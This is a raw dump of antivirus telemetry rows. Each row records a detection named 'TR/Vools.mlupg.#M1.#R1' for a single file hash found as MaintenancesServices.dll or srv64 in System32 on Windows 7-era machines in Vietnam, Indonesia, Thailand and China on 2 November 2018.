  Row(detection=Row(filename='avscan-20181102-074244-0b3cc7ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_39e889cd\\AVSCAN-20181102-074221-066F8179\\AVSCAN-20181102-074244-0B3CC7CA', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:42:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:29:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T00:18:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T07:16:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:19:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T05:20:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:30:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:49:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:45:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T02:00:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\McAfee\\VirusScan Enterprise\\x64\\McShield.exe', parentsize=181480, timestamp='2018-11-02T02:48:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101540-899619e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_39e889cd\\AVSCAN-20181102-101520-856F6A5B\\AVSCAN-20181102-101540-899619E1', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:15:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151441-95523004', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-151441-95523004', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:14:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:08:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:46:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T04:53:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:29:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:07:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:45:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\McAfee\\VirusScan Enterprise\\x64\\McShield.exe', parentsize=181480, timestamp='2018-11-02T02:48:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:56:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:59:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:14:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152856-b5c1740e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-152727-A42EE1EF\\AVSCAN-20181102-152856-B5C1740E', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:33:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:14:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192133-4b933d93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54bc9577\\AVSCAN-20181102-191914-3B86E593\\AVSCAN-20181102-192133-4B933D93', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:21:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:55:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:01:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151416-90241e85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-151416-90241E85', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:14:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192037-451939df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54bc9577\\AVSCAN-20181102-191914-3B86E593\\AVSCAN-20181102-192037-451939DF', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:20:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:19:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:31:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:36:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:28:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192054-470f11ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54bc9577\\AVSCAN-20181102-191914-3B86E593\\AVSCAN-20181102-192054-470F11AE', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:20:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151436-94400ba6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-151436-94400BA6', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:14:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T05:10:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151428-929d3c00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-151428-929D3C00', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:14:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151424-91e167a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-151424-91E167A4', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:14:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192124-4a962f49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54bc9577\\AVSCAN-20181102-191914-3B86E593\\AVSCAN-20181102-192124-4A962F49', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:21:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:02:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:32:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:43:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T00:25:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T02:05:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-195017-a8990d30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_759cb39a\\AVSCAN-20181102-194944-A23CF887\\AVSCAN-20181102-195017-A8990D30', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:50:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:11:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:48:31Z'), dt=datetime.date(2018, 11, 2)),
